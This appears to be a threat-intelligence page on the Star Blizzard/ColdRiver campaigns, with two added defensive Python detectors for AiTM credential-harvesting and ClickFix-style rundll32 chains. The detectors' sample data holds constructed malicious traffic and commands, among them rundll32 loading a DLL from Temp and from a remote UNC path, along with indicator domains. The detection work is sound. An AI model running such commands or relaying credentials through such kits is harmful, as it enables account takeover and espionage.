ColdRiver intensifies high-profile espionage campaign

Campaign · Happening score: 39 · 1 unique source, 2 articles

Summary

Star Blizzard (also tracked as ColdRiver and Callisto) continued its spear-phishing campaign in May and June 2025 against Reporters Without Borders (RSF) and a second organization. The operators impersonated trusted contacts, routed targets through redirects on compromised websites, and used a custom Adversary-in-the-Middle (AiTM) kit to harvest ProtonMail credentials and relay the resulting 2FA prompts, which is what lets an AiTM proxy defeat one-time codes: the victim's code is consumed by the attacker's session against the real service. The activity fits the group's long-running focus on Western entities supporting Ukraine and shows continued investment in credential harvesting, in the form of modified ProtonMail login pages and attacker-controlled API handling for the CAPTCHA and authentication steps.
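The summary above describes the shape of an AiTM credential-harvesting flow: a compromised site redirects the target to a login lookalike, and the CAPTCHA, password and 2FA steps are then posted to the attacker's host rather than to Proton. The following Python script is an added example of how a defender can spot that shape in web-proxy logs; it is not code from the page or from any vendor report. Only the kit host account.simpleasip[.]org comes from the page. The log format, the allowlist of Proton origins, the login-style hostname prefixes and the API paths in the sample lines are assumptions made for the example, and the sample traffic is constructed.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumption: legitimate Proton authentication origins that the defender allowlists.
PROTON_ORIGINS = {"proton.me", "account.proton.me", "mail.proton.me", "account.protonmail.com"}

# A hostname that borrows a login-style first label but is not a Proton origin has the
# shape of an AiTM front such as account.simpleasip[.]org (assumed prefix list).
LOGIN_HOST_PREFIXES = ("account.", "login.", "auth.", "sso.", "mail.")

# Path fragments that mark CAPTCHA, password and 2FA steps. Assumed; the kit's real
# endpoint names are not on the page.
AUTH_PATH_RE = re.compile(r"/(auth|login|signin|captcha|2fa|totp|verify)", re.IGNORECASE)


@dataclass
class Event:
    ts: datetime
    client: str
    method: str
    host: str
    path: str
    status: int
    location: str  # redirect target, "-" when absent


def refang(text: str) -> str:
    """Turn the defanged "[.]" used in reporting back into a real dot."""
    return text.replace("[.]", ".")


def parse_line(line: str) -> Event:
    # Assumed log format: "<iso-ts> <client-ip> <method> <url> <status> <location|->"
    ts, client, method, url, status, location = refang(line).split()
    u = urlsplit(url)
    return Event(datetime.fromisoformat(ts), client, method, u.hostname or "", u.path, int(status), location)


def is_proton(host: str) -> bool:
    return host in PROTON_ORIGINS or host.endswith(".proton.me")


def looks_like_login_host(host: str) -> bool:
    return host.startswith(LOGIN_HOST_PREFIXES) and not is_proton(host)


def detect(lines, window: timedelta = timedelta(minutes=10)):
    """Return findings for (a) redirects from any site into a login lookalike and
    (b) credential/CAPTCHA/2FA POSTs to a non-Proton host. A POST from a client that
    was redirected to the same host within `window` is rated high: that is the
    compromised-site -> AiTM kit chain described in the summary."""
    findings = []
    redirected = {}  # client -> (timestamp, lookalike host)
    for event in (parse_line(l) for l in lines if l.strip()):
        if 300 <= event.status < 400 and event.location != "-":
            target = urlsplit(event.location).hostname or ""
            if looks_like_login_host(target):
                findings.append({"rule": "redirect_to_login_lookalike", "client": event.client,
                                 "host": event.host, "target": target, "severity": "medium"})
                redirected[event.client] = (event.ts, target)
        if event.method == "POST" and not is_proton(event.host) and AUTH_PATH_RE.search(event.path):
            prev = redirected.get(event.client)
            chained = prev is not None and prev[1] == event.host and event.ts - prev[0] <= window
            findings.append({"rule": "offsite_credential_post", "client": event.client,
                             "host": event.host, "path": event.path,
                             "severity": "high" if chained else "medium"})
    return findings


# Constructed sample traffic: one victim redirected from a compromised site into the kit
# and then posting CAPTCHA, password and 2FA to it; one real Proton login; one harmless
# redirect. Hosts other than the kit domain are invented.
SAMPLE_LOG = """
2025-06-12T09:14:02 10.0.0.21 GET https://blog.compromised-site.test/article 302 https://account.simpleasip[.]org/login
2025-06-12T09:14:05 10.0.0.21 GET https://account.simpleasip[.]org/login 200 -
2025-06-12T09:14:31 10.0.0.21 POST https://account.simpleasip[.]org/api/captcha/verify 200 -
2025-06-12T09:14:40 10.0.0.21 POST https://account.simpleasip[.]org/api/auth 200 -
2025-06-12T09:15:10 10.0.0.21 POST https://account.simpleasip[.]org/api/2fa 200 -
2025-06-12T09:20:00 10.0.0.33 POST https://account.proton.me/api/auth 200 -
2025-06-12T09:21:00 10.0.0.40 GET https://news.example.test/ 301 https://www.news.example.test/
""".strip().splitlines()

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the script emits one redirect finding and three high-severity POST findings, all for the same client and the kit host; the legitimate Proton login and the ordinary www redirect produce nothing. In production the allowlist check on the hostname is the part worth keeping exact, since an AiTM kit is designed to look right in every other respect.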

Related Happenings

SHADOW-EARTH-053 China-aligned espionage campaign against Asian government and defense targets
Campaign · First: 01.05.2026 17:02 · Last: 01.05.2026 17:02 · Sources: 1
About this happening: **SHADOW-EARTH-053** is running an active **China-aligned espionage campaign** against **government and defense** targets across **South, East, and Southeast Asia** and **Poland**...

UNC6783 BPO compromise campaign targeting downstream companies
Campaign · First: 09.04.2026 00:46 · Last: 09.04.2026 00:46 · Sources: 1
About this happening: **UNC6783** is an active **BPO compromise campaign** targeting **business process outsourcers** and large enterprises to reach downstream environments for **extortion**. The opera...

Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
Campaign · First: 11.03.2026 16:45 · Last: 11.03.2026 16:45 · Sources: 1
About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

CRESCENTHARVEST malicious .LNK espionage campaign targeting Iran protest supporters
Campaign · First: 19.02.2026 10:13 · Last: 19.02.2026 10:13 · Sources: 1
About this happening: The **CRESCENTHARVEST** campaign is using **malicious .LNK files** and social engineering to target **supporters of Iran's ongoing protests** for **information theft** and **long-...

CANFAIL phishing campaign impersonating Ukrainian energy organizations
Campaign · First: 13.02.2026 19:27 · Last: 13.02.2026 19:27 · Sources: 1
About this happening: A **previously undocumented threat actor** is running a **CANFAIL phishing campaign** that impersonates **Ukrainian energy organizations** to gain unauthorized access to email acc...

Timeline

  1. 03.12.2025 18:45 · 1 article · 5mo ago

    Star Blizzard spear-phishing wave targets RSF and another organization

    Technical Analysis Update

    Star Blizzard, also known as ColdRiver or Callisto, was identified in a fresh spear-phishing wave against Reporters Without Borders (RSF) and another organization. The operators used impersonated trusted contacts, a custom Adversary-in-the-Middle (AiTM) kit hosted on account.simpleasip[.]org, modified ProtonMail interface elements, and attacker-controlled API handling for the CAPTCHA and two-factor authentication (2FA) steps to harvest credentials.

  2. 21.10.2025 13:02 · 2 articles · 7mo ago

    ColdRiver shifts to NoRobot, YesRobot and MaybeRobot

    Initial Disclosure

    GTIG reported that ColdRiver, also tracked as Star Blizzard, Callisto and UNC4057, had moved on from LostKeys to a new malware chain built around NoRobot, YesRobot and MaybeRobot. The chain opens with a ClickFix-style phishing lure and a fake CAPTCHA page that talks the target into running a command; that command launches a malicious DLL via rundll32.exe, and further stages are downloaded from inspectguarantee[.]org. GTIG read the rapid turnover of tooling as a faster development and operations tempo in the group's espionage against high-profile NGOs, former intelligence and military officers, and NATO governments.
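The second timeline entry describes an endpoint chain rather than a web one: a fake CAPTCHA persuades the user to run a command, rundll32.exe loads a DLL that did not come from the system directory, and follow-on stages are fetched from inspectguarantee[.]org. The following Python script is an added example of a detection over that chain; it is not code from GTIG or from the page. The only indicator taken from the page is the inspectguarantee[.]org domain. The event shape (simplified Sysmon-style process and DNS records), the user-writable path list, the interactive-parent list, and every path and DLL name in the sample events are assumptions constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Domain from the reporting summarized above, stored refanged.
IOC_DOMAINS = {"inspectguarantee.org"}

# Directories a standard user can write to. A DLL that rundll32 loads from one of these,
# or over UNC/WebDAV, is far more suspicious than a system DLL. Assumed list.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\downloads\\",
                 "\\programdata\\", "\\users\\public\\")

# Parents that mean a person typed or pasted the command (Run dialog -> explorer.exe,
# or a shell). That is the ClickFix pattern: the lure tells the victim what to paste.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

# First drive-letter or UNC path ending in .dll anywhere in the command line.
DLL_PATH_RE = re.compile(r'(?i)((?:[a-z]:\\|\\\\)[^",\s]*?\.dll)')


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def refang(domain: str) -> str:
    return domain.replace("[.]", ".").lower()


def dll_from_cmdline(cmdline: str):
    m = DLL_PATH_RE.search(cmdline)
    return m.group(1) if m else None


def is_suspicious_dll_path(path: str) -> bool:
    p = path.lower()
    return p.startswith("\\\\") or any(seg in p for seg in USER_WRITABLE)


def detect(events):
    """Walk events (dicts with type "dns" or "process") in time order. A DNS query for
    a known C2 domain is a high finding. A rundll32 launch of a DLL from a user-writable
    or UNC path is medium, raised to high when the parent is interactive; the finding is
    tagged ioc_context when the same host already resolved a C2 domain."""
    findings = []
    hosts_with_ioc = set()
    for ev in events:
        if ev["type"] == "dns":
            query = refang(ev["query"])
            if query in IOC_DOMAINS:
                hosts_with_ioc.add(ev["host"])
                findings.append({"rule": "ioc_dns", "host": ev["host"],
                                 "detail": query, "severity": "high"})
            continue
        if basename(ev["image"]) != "rundll32.exe":
            continue
        dll = dll_from_cmdline(ev["cmdline"])
        if not dll or not is_suspicious_dll_path(dll):
            continue
        interactive = basename(ev["parent_image"]) in INTERACTIVE_PARENTS
        findings.append({"rule": "rundll32_untrusted_dll", "host": ev["host"], "detail": dll,
                         "severity": "high" if interactive else "medium",
                         "ioc_context": ev["host"] in hosts_with_ioc})
    return findings


# Constructed events with simplified field names (an assumption, not Sysmon's own schema).
# WS01: C2 lookup, then a pasted rundll32 command loading a DLL from %TEMP%, then a benign
# rundll32 use. WS02: rundll32 pulling a DLL over a UNC/WebDAV path from a shell.
SAMPLE_EVENTS = [
    {"type": "dns", "host": "WS01", "query": "inspectguarantee[.]org"},
    {"type": "process", "host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\captcha_check.dll,Verify"},
    {"type": "process", "host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "process", "host": "WS02", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'rundll32 "\\10.20.30.40@443\share\verify.dll",Run'},
    {"type": "dns", "host": "WS02", "query": "update.example.test"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The benign shell32.dll launch is ignored because the path check, not the process name, carries the signal; rundll32.exe itself is used constantly by Windows. The ioc_context flag is what turns a medium-confidence process event into something worth paging on when the page's C2 domain has already been resolved from the same host.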